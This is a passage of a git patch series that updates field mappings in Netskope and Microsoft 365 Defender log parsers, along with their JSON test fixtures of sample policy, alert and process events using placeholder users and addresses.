HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", "event": { - "action": "block", + "action": "Browse", "category": [ "network" ], @@ -23,6 +23,9 @@ ] }, "@timestamp": "2024-11-14T09:01:32Z", + "action": { + "name": "block" + }, "destination": { "address": "1.2.3.4", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json index d0d9ed304..412ece514 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_log.json +++ b/Netskope/netskope_events/tests/test_nspolicy_log.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T15:52:00Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "Example" diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json index b05f61a9d..314e7d7e1 100644 --- a/Netskope/netskope_events/tests/test_nspolicy_upload.json +++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json @@ -23,6 +23,9 @@ ] }, "@timestamp": "2024-11-14T09:04:46Z", + "action": { + "name": "Allow" + }, "destination": { "address": "1.2.3.4", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json index 4c435b860..bb5831a9c 100644 --- a/Netskope/netskope_events/tests/test_user_alert.json +++ b/Netskope/netskope_events/tests/test_user_alert.json @@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"useralert\",\n \"activity\": \"Share\",\n \"alert\": \"yes\",\n \"app\": \"WeTransfer\",\n \"app_session_id\": 1111111111111111111,\n \"appcategory\": \"Cloud Storage\",\n \"browser\": \"Edge\",\n \"browser_session_id\": 2222222222222222222,\n \"browser_version\": \"108.0.1462.54\",\n \"category\": \"Cloud Storage\",\n \"cci\": 58,\n \"ccl\": \"low\",\n \"connection_id\": 3333333333333333333,\n \"count\": 1,\n \"device\": \"Windows Device\",\n \"device_classification\": \"unmanaged\",\n \"dst_country\": \"IE\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 53.3379,\n \"dst_location\": \"Dublin\",\n \"dst_longitude\": -6.2591,\n \"dst_region\": \"Leinster\",\n \"dst_timezone\": \"Europe/Dublin\",\n \"dst_zipcode\": \"D02\",\n \"dstip\": \"108.128.91.183\",\n \"from_user\": \"jane.doe@example.org\",\n \"hostname\": \"TEST-1234\",\n \"managed_app\": \"no\",\n \"managementID\": \"99999999999999999999999999999999\",\n \"netskope_pop\": \"FR-PAR1\",\n \"notify_template\": \"useralert_justify.html\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"Client.exe\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Windows 11\",\n \"os_version\": \"Windows 11\",\n \"page\": \"wetransfer.com/\",\n \"page_site\": \"Web Background\",\n \"policy\": \"DO NOT CHANGE Educate Upload to Non-Corporate Storage\",\n \"policy_id\": \"99999999999999999999999999999999 2022-12-21 14:31:09.981853\",\n \"protocol\": \"HTTPS/2\",\n \"referer\": \"https://wetransfer.com/\",\n \"request_id\": 4444444444444444444,\n \"severity\": \"unknown\",\n \"site\": \"WeTransfer\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 15:52:08 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"telemetry_app\": \"\",\n \"timestamp\": 1671634321,\n \"to_user\": \"a@a.fr\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 4444444444444444444,\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"wetransfer.com/api/v4/transfers/email\",\n \"user\": \"john.doe@example.org\",\n \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"internal_collaborator_count\": 0,\n \"fromlogs\": \"\",\n \"dlp_incident_id\": 0,\n \"owner\": \"\",\n \"dlp_profile\": \"\",\n \"workspace\": \"\",\n \"user_id\": \"\",\n \"userPrincipalName\": \"\",\n \"true_obj_category\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"orignal_file_path\": \"\",\n \"other_categories\": [],\n \"serial\": \"\",\n \"tss_mode\": \"\",\n \"conn_duration\": 0,\n \"from_user_category\": \"\",\n \"md5\": \"\",\n \"data_type\": \"\",\n \"title\": \"\",\n \"log_file_name\": \"\",\n \"dstport\": 0,\n \"exposure\": \"\",\n \"instance_id\": \"\",\n \"audit_category\": \"\",\n \"netskope_activity\": \"\",\n \"file_type\": \"\",\n \"total_collaborator_count\": 0,\n \"file_path\": \"\",\n \"modified\": 0,\n \"dlp_rule_count\": 0,\n \"suppression_end_time\": 0,\n \"CononicalName\": \"\",\n \"alert_type\": \"\",\n \"sanctioned_instance\": \"\",\n \"suppression_start_time\": 0,\n \"dlp_parent_id\": 0,\n \"true_obj_type\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"audit_type\": \"\",\n \"workspace_id\": \"\",\n \"dsthost\": \"\",\n \"web_universal_connector\": \"\",\n \"req_cnt\": 0,\n \"mime_type\": \"\",\n \"suppression_key\": \"\",\n \"scan_type\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"object_id\": \"\",\n \"user_category\": \"\",\n \"dlp_rule\": \"\",\n \"parent_id\": \"\",\n \"sha256\": \"\",\n \"dlp_rule_severity\": \"\",\n \"logintype\": \"\",\n \"org\": \"\",\n \"dlp_unique_count\": 0,\n \"file_size\": 0,\n \"instance\": \"\",\n \"sAMAccountName\": \"\",\n \"resp_cnt\": 0,\n \"universal_connector\": \"\",\n \"numbytes\": 0,\n \"server_bytes\": 0,\n \"channel_id\": \"\",\n \"file_lang\": \"\",\n \"app_activity\": \"\",\n \"appsuite\": \"\",\n \"sessionid\": \"\",\n \"loginurl\": \"\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"custom_connector\": \"\"\n}\n", "event": { - "action": "useralert", + "action": "Share", "category": [ "network" ], @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:52:01Z", + "action": { + "name": "useralert" + }, "destination": { "address": "108.128.91.183", "bytes": 0, From 9264ef70512e299c783d05b43afb38dacd4c3431 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Thu, 28 Nov 2024 10:25:08 +0100 Subject: [PATCH 77/84] Update Microsoft/microsoft-365-defender/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Microsoft/microsoft-365-defender/ingest/parser.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index fc32171cd..d212bdb11 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -267,7 +267,8 @@ stages: action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" From a4b94af6afa920ba08482254408c406c0ef90db6 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 28 Nov 2024 11:57:27 +0100 Subject: [PATCH 78/84] Correction of overwrited test file --- .../tests/test_device_process_events_2.json | 114 ++++++------------ 1 file changed, 36 insertions(+), 78 deletions(-) diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json index cab75fb0a..9b0327128 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json @@ -1,6 +1,6 @@ { "input": { - "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 Defender", @@ -9,7 +9,7 @@ } }, "expected": { - "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": 